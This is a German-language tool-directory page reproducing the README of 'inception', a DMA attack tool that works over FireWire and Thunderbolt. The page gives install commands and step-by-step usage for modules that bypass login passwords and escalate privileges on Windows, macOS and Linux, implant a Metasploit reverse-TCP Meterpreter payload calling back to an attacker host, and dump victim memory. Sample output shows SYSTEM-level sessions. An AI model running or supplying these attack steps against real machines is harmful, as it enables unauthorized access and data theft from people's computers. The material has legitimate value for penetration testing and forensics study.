Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
inception — Inception ist ein Tool zur Manipulation von physischem Speicher und zum Hacken, das PCI-basiertes DMA ausnutzt. Das Tool kann über FireWire, Thunderbolt, ExpressCard, PC Card und andere PCI/PCIe-Schnittstellen angreifen. | Kitploit
Tools/GitHubGitHub/carmaa/inception
Privilege EscalationSpeicherforensikExploitationPost-ExploitationDigitale ForensikPenetrationstestsHardware-SicherheitRed TeamingPayload-Entwicklung
GitHubcarmaa/inception

inception

Inception ist ein Tool zur Manipulation von physischem Speicher und zum Hacken, das PCI-basiertes DMA ausnutzt. Das Tool kann über FireWire, Thunderbolt, ExpressCard, PC Card und andere PCI/PCIe-Schnittstellen angreifen.

1.6k19818vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Hinweis: Dieses Tool wird nicht mehr aktiv weiterentwickelt. Bitte schauen Sie sich stattdessen PCILeech an.

INCEPTION

Inception ist ein Tool zur Manipulation und zum Hacken von physischem Arbeitsspeicher, das PCI-basiertes DMA ausnutzt. Das Tool kann über FireWire, Thunderbolt, ExpressCard, PC Card und andere PCI/PCIe-HW-Schnittstellen angreifen.

Inception zielt darauf ab, eine relativ schnelle, stabile, einfache und erweiterbare Möglichkeit zu bieten, intrusive und nicht-intrusive Speicher-Hacks gegen laufende Computer mittels DMA durchzuführen.

Wie es funktioniert

Die Module von Inception funktionieren wie folgt: Indem dem Opfer-Rechner über eine IEEE1394-FireWire-Schnittstelle ein Serial-Bus-Protocol-2 (SBP-2)-Unit-Directory präsentiert wird, denkt das Betriebssystem des Opfers, dass ein SBP-2-Gerät an den FireWire-Port angeschlossen wurde. Da SBP-2-Geräte Direct Memory Access (DMA) für schnelle, große Datenübertragungen nutzen (z. B. FireWire-Festplatten und digitale Camcorder), senkt das Opfer seine Schutzmechanismen und aktiviert DMA für das Gerät. Das Tool hat nun vollen Lese-/Schreibzugriff auf die unteren 4 GB RAM des Opfers.

Sobald DMA gewährt wird, durchsucht das Tool verfügbare Speicherseiten nach Signaturen an bestimmten Offsets im Code des Betriebssystems. Sobald diese gefunden werden, manipuliert das Tool diesen Code. Im Entsperrmodul beispielsweise schließt das Tool das Passwort-Authentifizierungsmodul des Betriebssystems kurz, das bei Eingabe eines falschen Passworts ausgelöst wird.

Nach Ausführung dieses Moduls sollten Sie sich mit jedem beliebigen Passwort am Opfer-Rechner anmelden können.

Eine Analogie für diesen Vorgang ist das Einpflanzen einer Idee in den Speicher der Maschine: der Idee, dass jedes Passwort korrekt ist. Mit anderen Worten, das Äquivalent einer [Speicher-Inception] 1.

Inception ist frei wie in ‚umsonst‘ und ein Nebenprojekt von mir.

Großartig! Aber warum?

Forensik-Experten, Regierungen und Drei-Buchstaben-Agenturen auf der ganzen Welt verwenden bereits [ähnliche Tools] 2. Wenn Sie also ein Dissident sind oder einem repressiven Regime gegenüberstehen, zeigt dieses Tool, warum OPSEC wichtig ist. Lassen Sie Ihren Laptop niemals unbeaufsichtigt.

Einschränkungen

[OS X > 10.7.2] 6 und [Windows > 8.1] 7 deaktivieren FireWire-DMA, wenn der Benutzer das Betriebssystem gesperrt hat, und verhindern so Inception. Das Tool funktioniert weiterhin, solange ein Benutzer angemeldet ist. Dies ist jedoch ein weniger wahrscheinliches Angriffsszenario im echten Leben.

Darüber hinaus wurde bei [OS X Mavericks > 10.8.2 auf Ivy Bridge (>= 2012 Macs)] 8 VT-D aktiviert, was DMA-Anfragen effektiv blockiert und alle Inception-Module selbst bei angemeldetem Benutzer vereitelt. Achten Sie auf vtd[0] fault-Einträge in Ihrem Log/Konsolen-Ausgabe.

Auch wenn diese beiden Einschränkungen die Anzahl der Szenarien, in denen dieses Tool nützlich ist, allmählich reduzieren werden, sind Stand März 2015 noch [70 % der Rechner da draußen anfällig] 9.

Schlüsseldaten

  • Version: 0.4.2
  • Lizenz: GPL
  • Autor: Carsten Maartmann-Moe ([email protected])
  • Twitter: @MaartmannMoe
  • Quelle: https://github.com/carmaa/inception

Das Tool verwendet die libforensic1394-Bibliothek, freundlicherweise bereitgestellt von Freddie Witherden unter einer LGPL-Lizenz.

Anforderungen

Inception benötigt:

  • Hardware:
    • Angreifer-Rechner: Linux oder Mac OS X (Host/Angreifer) mit einer FireWire-Schnittstelle, entweder über einen nativen FireWire-Anschluss, einen ExpressCard/PCMCIA-Erweiterungssteckplatz oder einen Thunderbolt-zu-FireWire-Adapter.
    • Opfer-Rechner: Eine FireWire- oder Thunderbolt-Schnittstelle oder ein ExpressCard/PCMCIA-Erweiterungssteckplatz

Linux wird derzeit auf der Angreiferseite empfohlen, da die FireWire-Schnittstellen unter OS X fehlerhaft sind. Beachten Sie, dass direkte Thunderbolt-zu-Thunderbolt-Verbindungen nicht funktionieren, Sie benötigen einen FireWire-Adapter. Ihre Erfahrungen bei der Verwendung von Thunderbolt unter Linux können abweichen.

  • Software:
    • Python 3
    • git
    • gcc (incl. g++)
    • cmake
    • pip (für automatische Abhängigkeitsauflösung)
    • [libforensic1394] 3
    • msgpack

Installation

Auf Debian-basierten Distributionen können die Installationsbefehle wie folgt zusammengefasst werden (verwenden Sie sudo nach Bedarf, wenn Sie nicht root sind):

root@kitploit:~
apt-get install git cmake g++ python3 python3-pip

Unter OS X können Sie die Tool-Anforderungen mit [homebrew] 4 installieren:

root@kitploit:~
brew install git cmake python3

Nach der Installation der Anforderungen laden Sie libforensic1394 herunter und installieren Sie es:

root@kitploit:~
wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz -O - | tar xz
cd libforensic1394-0.2
cmake CMakeLists.txt
make install
cd python
python3 setup.py install

Inception herunterladen und installieren

root@kitploit:~
git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

Das Setup-Skript sollte in der Lage sein, Abhängigkeiten zu installieren, wenn Sie pip installiert haben.

Allgemeine Verwendung

  1. Verbinden Sie den Angreifer-Rechner (Host) und das Opfer (Ziel) mit einem FireWire-Kabel
  2. Führen Sie Inception aus

Geben Sie einfach ein:

root@kitploit:~
incept [Modulname]

Für eine vollständigere und aktuelle Beschreibung führen Sie bitte aus:

root@kitploit:~
incept -h

oder schauen Sie auf der [Tool-Startseite] 5 nach.

Module

Ab Version 0.4.0 wurde Inception modularisiert. Die aktuellen Module und ihre Funktionalität werden im Folgenden beschrieben.

Für detaillierte Optionen zur Verwendung führen Sie aus:

root@kitploit:~
incept [Modulname] -h

Unlock

Das unlock-Modul kann fast* jeden eingeschalteten Rechner, zu dem Sie physischen Zugriff haben, entsperren (jedes Passwort wird akzeptiert) und die Berechtigungen auf Administrator/Root erhöhen. Das Modul ist in erster Linie darauf ausgelegt, seine Magie gegen Computer zu vollbringen, die eine vollständige Festplattenverschlüsselung wie BitLocker, FileVault, TrueCrypt oder Pointsec verwenden. Es gibt viele andere (und bessere) Möglichkeiten, einen Rechner zu hacken, der keine Verschlüsselung verwendet.

Das Entsperrmodul ist stabil auf Rechnern mit 4 GiB Hauptspeicher oder weniger. Wenn Ihr Ziel mehr als das hat, müssen Sie Glück haben, um die Signaturen zu finden, die auf einen physischen Speicherseitenrahmen abgebildet sind, den das Tool erreichen kann.

Ab dieser Version kann es die folgenden x86- und x64-Betriebssysteme entsperren:

(1): Siehe Einschränkungen oben.

Andere Linux-Distributionen, die PAM-basierte Authentifizierung verwenden, funktionieren möglicherweise ebenfalls mit den Ubuntu-Signaturen.

Das Modul ermöglicht auch effektiv die Privilegienausweitung, beispielsweise über die runas- bzw. sudo -s-Befehle.

Ausführung

Zum Entsperren geben Sie einfach ein:

root@kitploit:~
incept unlock

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: https://github.com/carmaa/inception | Twitter: @MaartmannMoe

[?] Will potentially write to file. OK? [y/N] y
[*] Available targets (known signatures):

[1] Windows 8 MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7 MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu libpam unlock/privilege escalation
[7] Linux Mint libpam unlock/privilege escalation

[?] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation
[=============>                                                ]  227 MiB ( 22%)
[*] Signature found at 0xe373312 in page no. 58227
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

Implant

Das implant-Modul implantiert ein (nur im Speicher befindliches) Metasploit-Payload direkt in den flüchtigen Speicher des Zielrechners. Es integriert sich mit MSF über den msfrpcd-Daemon, der in allen Versionen von Metasploit enthalten ist.

Die aktuelle Version funktioniert nur als Proof-of-Concept gegen Windows 7 SP1 x86. Keine anderen Betriebssysteme, Versionen oder Architekturen werden unterstützt, und es gibt auch keine Garantie, dass sie in Zukunft unterstützt werden.

Ausführung

Um es zu verwenden, starten Sie msfrpcd:

root@kitploit:~
msfrpcd -P [Passwort]

Starten Sie dann Inception in einem anderen Terminal:

root@kitploit:~
incept implant --msfpw [Passwort] --msfopts [Optionen]

Als Beispiel: Um eine Reverse-TCP-Meterpreter-Shell vom Zielrechner zu Ihrem Angreifer-Host zu erstellen, starten Sie zuerst den msfrpcd-Daemon und starten dann eine Konsole, die auf Rückrufe wartet.

root@kitploit:~
msfrpcd -P password
msfconsole

In der Konsole konfigurieren wir die Empfängerseite des Payloads. Wir setzen die Option EXITFUNC auf thread, um sicherzustellen, dass der Zielprozess am Leben bleibt, falls etwas schief geht:

root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.1
set EXITFUNC thread
set ExitOnSession false
exploit -j

Dann starten wir Inception in einem anderen Terminal:

root@kitploit:~
incept implant --msfpw password --msfopts LHOST=172.16.1.1

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: https://github.com/carmaa/inception | Twitter: @MaartmannMoe

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  537 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  434 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

In Ihrer MSF-Konsole sollten Sie etwas Ähnliches sehen:

root@kitploit:~
msf exploit(handler) > [*] Sending stage (769536 bytes) to 172.16.78.200
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 172.16.78.200:49178) at 2014-08-30 16:23:31 +0200

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-11FMQRBAMJ6  172.16.1.1:4444 -> 172.16.78.200:49178 (172.16.78.200)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Dump

Das dump-Modul ermöglicht das Auslesen des Speichers vom Ziel auf den angreifenden Host.

Ausführung

root@kitploit:~
incept dump

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: https://github.com/carmaa/inception | Twitter: @MaartmannMoe

[*] Dumping from 0x0 to 0x40000000, a total of 1 GiB:
[==============================================================] 1024 MiB (100%)
[*] Dumped memory to file memdump_0x0-0x40000000_20140830-174305.bin
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

Bekannte Fehler / Einschränkungen

Bitte beachten Sie die Kommentare oben und die [Tool-Startseite] 5.

Fehlerbehebung

Bitte schauen Sie auf der [Tool-Startseite] 5 nach.

Geplante Funktionen

  • Zuverlässige Implants auf x64
  • VT-D-Umgehung
  • Kernel (Ring 0) Implants
  • Weitere Signaturen

Entwicklungsgeschichte

  • 0.0.1 - Erste Version, unterstützt grundlegendes Entsperren von Windows XP SP3, Vista und 7, Mac OS X und Ubuntu Gnome
  • 0.0.2 - Signaturen für frühes XP SP3 und Windows 7 x86 und x64 SP1 hinzugefügt
  • 0.0.3 - Einige Signaturen (Danke an Tekkenhead) und Fehlerbehandlung hinzugefügt
  • 0.0.4 - businfo hinzugefügt, um angeschlossene FireWire-Geräte anzuzeigen, sowie Speicherauszugsfunktionen
  • 0.0.5 - Verbesserte Speicherauszugsfähigkeiten und Probenkatalog hinzugefügt
  • 0.0.6 - Unit-Tests hinzugefügt
  • 0.0.7 - Ubuntu-Signaturen und Privilegienausweitung aktualisiert – Danke an Adel Khaldi aus Algerien
  • 0.0.8 - Korrigierte Ubuntu-Entsperr- und Privilegienausweitungs-Patches – ein einzelner Patch für doppelte Wirkung
  • 0.1.0 - Erste Nebenversion! Signaturen für OS X und Vista hinzugefügt, plus einige Fehlerbehebungen
  • 0.1.1 - Signaturen für Ubuntu 12.04 LTS hinzugefügt
  • 0.1.2 - Mehrere Fehler behoben
  • 0.1.3 - Fehler in der OS X 10.6.8 x64-Signatur behoben
  • 0.1.4 - Manueller Modus hinzugefügt, der das Testen neuer Signaturen erleichtert
  • 0.2.0 - Signaturen für OS X Mountain Lion (10.8) und Windows 8 hinzugefügt
  • 0.2.1 - Signaturen für Ubuntu 12.10 hinzugefügt
  • 0.2.2 - Signaturen für Linux Mint hinzugefügt
  • 0.2.3 - Allgemeine Codebereinigung und schönere, konsistentere Ausgabe
  • 0.2.4 - Fortschrittsbalken hinzugefügt
  • 0.2.5 - Keine Root-Rechte mehr erforderlich, um das Tool auszuführen
  • 0.2.6 - Fehlerbehebungen
  • 0.3.0 - Unterstützung für Ubuntu 13.04 Ziele hinzugefügt
  • 0.3.1 - Unterstützung für OS X Mavericks und Windows 8.1 hinzugefügt
  • 0.3.2 - Fehlerbehebungen und Unterstützung für Ubuntu 13.10
  • 0.3.3 - Fehlerbehebungen bezüglich Ausgabe und Fehlerbehandlung
  • 0.3.4 - Maestro!
  • 0.3.5 - Ubuntu 10.10 und 10.04 x86 Signaturen hinzugefügt
  • 0.4.0 - Vollständige Umstrukturierung und Neuschreibung. Implant-Modul hinzugefügt
  • 0.4.1 - SLOTSCREAMER-Schnittstellenunterstützung integriert
  • 0.4.2 - Neue Signaturen

Haftungsausschluss

Füge mit diesem Tool kein Unheil zu. Außerdem bin ich ein Pentester, kein Entwickler. Wenn Sie also seltsamen Code sehen, der Ihre pythonischen Reinheitsgefühle stört, hinterlassen Sie mir eine Notiz, wie ich ihn verbessern kann. Oder noch besser: Forken Sie meinen Code, ändern Sie ihn und erstellen Sie einen Pull-Request.

Tool herunterladen
BetriebssystemVersionBildschirmsperre entsperrenBerechtigungen erhöhen
Windows 88.1Ja (1)Ja (1)
Windows 88.0JaJa
Windows 7SP1JaJa
Windows 7SP0JaJa
Windows VistaSP2JaJa
Windows VistaSP1JaJa
Windows VistaSP0JaJa
Windows XPSP3JaJa
Windows XPSP2JaJa
Windows XPSP1
Windows XPSP0
Mac OS XMavericksJa (1)Ja (1)
Mac OS XMountain LionJa (1)Ja (1)
Mac OS XLionJa (1)Ja (1)
Mac OS XSnow LeopardJaJa
Mac OS XLeopard
UbuntuSaucyJaJa
UbuntuRaringJaJa
UbuntuQuantalJaJa
UbuntuPreciseJaJa
UbuntuOneiricJaJa
UbuntuNattyJaJa
Linux Mint13JaJa
Linux Mint12JaJa
Linux Mint12JaJa